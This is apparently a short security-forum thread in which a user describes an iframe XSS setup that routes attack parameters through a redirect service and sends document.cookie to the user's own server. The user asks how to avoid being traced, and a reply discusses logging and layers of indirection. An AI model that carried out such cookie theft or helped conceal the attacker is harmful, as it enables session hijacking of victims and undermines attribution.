Using redirect prefixes for iframe hacksSuppose I use
&lt;iframe src=&quot;http://REDIRECTurlPREFIX.net?url=http://siteTOhack.org?injVar=attackParameters&quot;&gt;
on my server and the attack parameters send a cookie to my server with a regular
http://site/com?c=document.cookie
Is my server's IP or URL logged? If so, how can I be anonymous?
Thanks.http://sla.ckers.org/forum/read.php?15,12041,12041#msg-12041
Tue, 31 Mar 2015 13:06:48 -0500Phorum 5.2.15ahttp://sla.ckers.org/forum/read.php?15,12041,12050#msg-12050Re: Using redirect prefixes for iframe hackshttp://sla.ckers.org/forum/read.php?15,12041,12050#msg-12050
Yes, it is; in that it is probably in the user's cache/browsing history. Does this matter? Not really; anyone who is looking for it can find it without needing to see it in the cache/browsing history.

You could try using something like http://www.dapper.net/ but that's just an extra level of indirection.

By the sever?

It usually is, depending on how you execute your attack, but it doesn't have to be, for more info read these two posts:

The second post is probably much more useful for you though, but you might want to read the first one, since its a different (but less optimal) solution.

So while you can hide things from the XSSed server, a user who is trying to find your server will (with enough skill) always be able to find it.]]>kuza55PrivacyThu, 31 May 2007 01:00:07 -0500http://sla.ckers.org/forum/read.php?15,12041,12041#msg-12041Using redirect prefixes for iframe hackshttp://sla.ckers.org/forum/read.php?15,12041,12041#msg-12041